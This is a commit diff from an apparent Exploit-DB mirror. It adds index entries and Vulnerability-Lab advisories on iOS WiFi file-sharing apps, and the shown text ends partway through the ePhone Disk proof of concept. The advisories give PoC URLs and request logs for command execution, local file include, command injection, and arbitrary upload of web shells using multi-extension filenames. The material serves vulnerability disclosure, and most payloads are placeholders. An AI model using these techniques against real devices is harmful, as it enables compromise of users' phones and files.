bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_29_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-29 04:33:51 +00:00
parent b4268e8a98
commit 211b2f8394
7 changed files with 1297 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80
@ -29318,3 +29318,9 @@ id,file,description,date,author,platform,type,port
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80

Can't render this file because it is too large.

163
platforms/hardware/webapps/32557.txt Executable file
View file

@ -0,0 +1,163 @@
Document Title:
===============
FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1231
Release Date:
=============
2014-03-20
Vulnerability Laboratory ID (VL-ID):
====================================
1231
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
FTP Drive + HTTP Server is the ultimate app as for usefullness and ease of use to bring with you and share all your
important files through your iPhone/iPod! When you`re in a hurry or simply wants the things done as they are supposed
to be done, you can use FTP Drive + HTTP Server. As the name implies, you can use this app mainly as an FTP Server,
so you can mount it as a Network Drive in your favorite operative system or you can browse the files through a web
browser like Firefox, Safari, Chrome, Internet Explorer, ...
(Copy of the Homepage: https://itunes.apple.com/us/app/ftp-drive-+-http-server-easiest/id455671784 )
(Vendor Homepage: http://www.gummybearstudios.com/ios.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered a code execution web vulnerability in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
The remote vulnerbaility allows an attacker to compromise the application and connected device components by usage of a system specific command execution.
The vulnerability is located in the create folder input field. The input field direct executes the input via GET method request. The request has only a simple
quotes encoding. Remote attackers are easily able to execute code by usage of a script code payload in combination with system device specific php code values.
The execution of the code occurs in the main index file dir listing service context. The attack vector is on application-side and the request method to attack
the service is GET. To bypass the path values validation it is required to first add a folder via `newDir` value. The remote attacker is able to tamper the
create new folder post method request and can intercept the values twice to attach the second manipulated path value to provoke a code execution. After the
add it is possible to attach to the already included values via create new folder to execute the code. The security risk of the remote code execution web
vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.0(+)|(-)9.1.
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected component compromise.
Vulnerable Module(s):
[+] Create New Folder
Vulnerable Parameter(s):
[+] path value
Proof of Concept (PoC):
=======================
The php code execution web vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC:
http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[3173] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[3173]
Date[Mi., 19 M?r. 2014 15:06:04 GMT]
Solution - Fix & Patch:
=======================
The code execution web vulnerability can be patched by a secure parse of the create new folder input field.
Adjust the encoding of the affected foldername output context value in the main index file dir list.
Security Risk:
==============
The security risk of the remote code execution web vulnerability in the create new folder module is estimated as critical.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

262
platforms/hardware/webapps/32558.txt Executable file
View file

@ -0,0 +1,262 @@
Document Title:
===============
Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1233
Release Date:
=============
2014-03-21
Vulnerability Laboratory ID (VL-ID):
====================================
1233
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
WiFi Music lets you transfer via Wi-Fi the songs you have in your computer to any iPhone, iPod touch or iPad
in your network. No iTunes required. Now you can share them with your friends and workmates, and stream them
directly to almost any media player!
( Copy to the Vendor Homepage: https://itunes.apple.com/de/app/wifi-music/id469617062 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical vulnerabilities in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload File` module. Remote attackers are able to inject own files with
malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and
the request method is POST. The local file/path include execution occcurs in the main music file dir list. The security risk of the local
file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with
low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device
component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` (video and music) module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `ptest.mp3.html.php.js.aspx.mp3`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .mp3 file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.7(+)|(-)7.8.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: iChm File Management - Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead><tbody id="filelist">
<tr><td><a href="/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E" class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!]"></a></td>
<td class='del'><form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E' method='post'><input name='_method' value='delete'
type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
Source: Vulnerable Java Script (iChm File Management - Index)
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'>
<form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\"
type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------280732177711982
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE WEB VULNERABILITY!]>"
Content-Type: image/png
Reference(s):
http://localhost:8080/[Index File Dir Listing]
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/files/[ARBITRARY FILE UPLOAD PATH]-ptest.mp3.html.php.js.aspx.mp3`
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------141831923231387
Content-Disposition: form-data; name="newfile"; filename="ptest.mp3.html.php.js.aspx.mp3"
Content-Type: image/jpeg
Reference(s):
http://localhost:8080/files
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output listing of the index.
1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
Reset the executable rights for html and php codes in the little web-server settings config for /files.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(-).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

250
platforms/hardware/webapps/32559.txt Executable file
View file

@ -0,0 +1,250 @@
Document Title:
===============
Easy FileManager 1.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1234
Release Date:
=============
2014-03-25
Vulnerability Laboratory ID (VL-ID):
====================================
1234
Common Vulnerability Scoring System:
====================================
7.9
Product & Service Introduction:
===============================
This is a file management app which is very easy to use. You can manage your files under the specified directory, including copy,
cut, paste, delete, rename and create new directory. Preview the picture and play audio and video directly from the folder are supported.
This app also includes a simple FTP client. Users can use this client to connect to the remote ftp server, upload and download files from
the remote ftp server. It also includes a FTP Server and a HTTP Server. When you start the FTP Server, you can use common FTP client or
windows explorer to connect to the iphone via wifi. Also, when you start the HTTP Server, you can use internet browser to connect to the
server via wifi. It makes your iphone as a portable U disk. Its really easyt to use this app. The function buttons are clearly. Also,
you can just long click the screen to get the action list.
(Copy of the Homepage: https://itunes.apple.com/de/app/easy-file-manager/id487524125 )
(Vendor Homepage: http://www.easytimestudio.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Easytime Studio
Product: Easy File Manager - iOS Mobile Web Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload File > Send Data` module. Remote attackers are able to inject own
files with malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attacker is able to
tamper the file upload POST method request to manipulate via intercept the vulnerable filename value. The request method to exploit is
POST and the attack vector is on the application-side of the wifi iOS mobile application. The local file/path include execution occcurs
in the main directory dir list. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common
vulnerability scoring system) count of 7.8(+)|(-)7.9.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `Upload File > Send Data` (resources & files) module. Remote attackers are able to upload a php or js web-shells
by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
name and extension `ptest.txt.html.php.js.aspx.txt`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .txt file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.9(+)|(-)7.0.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File
Vulnerable Function(s):
[+] Send Data
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
PoC: Local File Include Vulnerability
http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/[LOCAL FILE INCLUDE VULNERABILITY!]
--- PoC- Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[1807] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept
[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var/mobile/Applications/7A8AF3A4
-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------881557262072
Content-Disposition: form-data; name="uploadfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
1.2
The arbitary file uplaod web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
PoC: Arbitrary File Upload Vulnerability (Upload File)
http://localhost:8080/private/var/./.\[http://localhost:8080/private/var/mobile/Applications/]+File
--- PoC- Session Logs [POST] ---
Status: pending[]
POST http://localhost:8080/private/var Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var]
POST-Daten:
POST_DATA[-----------------------------245202094720816
Content-Disposition: form-data; name="uploadfile"; filename="test.jpg.html.php.asp.html.jpg"
Content-Type: image/jpeg
Note: After the upload to the private /var folder the attacker is able to attach the document path with the file to compromise the web-server.
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output listing of the index.
1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
Reset the executable rights for html and php codes in the little web-server settings config for /files.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

269
platforms/hardware/webapps/32560.txt Executable file
View file

@ -0,0 +1,269 @@
Document Title:
===============
ePhone Disk v1.0.2 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1230
Release Date:
=============
2014-03-25
Vulnerability Laboratory ID (VL-ID):
====================================
1230
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
ePhone Disk is lightweight file manager that lets you download, organize, transfer, offline read your files.
It provides the most advanced WiFi sharing features in market.
SHARE FILES VIA WIFI
- Access iPhone like a USB drive from computer, simply use Drag and Drop to manage files
- Discover nearby devices, and discoverable by others
- Single tap to connect to nearby devices
- Accessible from any WebDav client
( Copy of the Homepage: https://itunes.apple.com/us/app/ephone-disk-download-share/id621895613 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Easiermobile Inc
Product: ePhone Disk iOS - Download, Share Files via WiFi 1.0.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious
`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability
is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Upload File > Index File Dir List (http://localhost:8080)
1.2
A local command/path injection web vulnerabilities has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `foldername` value of the wifi file dir list module. Local attackers are able to inject own malicious
system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders.
The execution of the local command inject bug via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of
the local command/path inject vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3(+)|(-)6.4.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] Sync [POST]
Vulnerable Parameter(s):
[+] foldername (path value)
Affected Module(s):
[+] ./[iPhone]/Sub Category x - File Dir Listing
1.3
A remote denial of service web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A denial of service vulnerability allows remote attackers to block, freeze or crash the affected or vulnerable mobile online-service application.
The vulnerability is located in the vulnerable `[download]` value of the downloads module. Local attackers are able to include tags as download
path value via GET method request. The application responds with an unhandled exception and the result is a permanent online-service and
application crash. The security risk of the remote denial of service web vulnerability is estimated as low(+) with a cvss (common vulnerability
scoring system) count of 1.8(+)|(-)1.9.
Exploitation of the denial of service web vulnerability requires no privileged iOS device account but low user interaction (allow|accept).
Successful exploitation of the DoS vulnerability results in unauthorized execution of system specific commands and unauthorized path value
requests to compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] ?download
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers with low user interaction and with low privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Upload File > Name > [Index File Dir List]
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"/><th class="name">Name</th><th class="modifieddate">Date Modified</th>
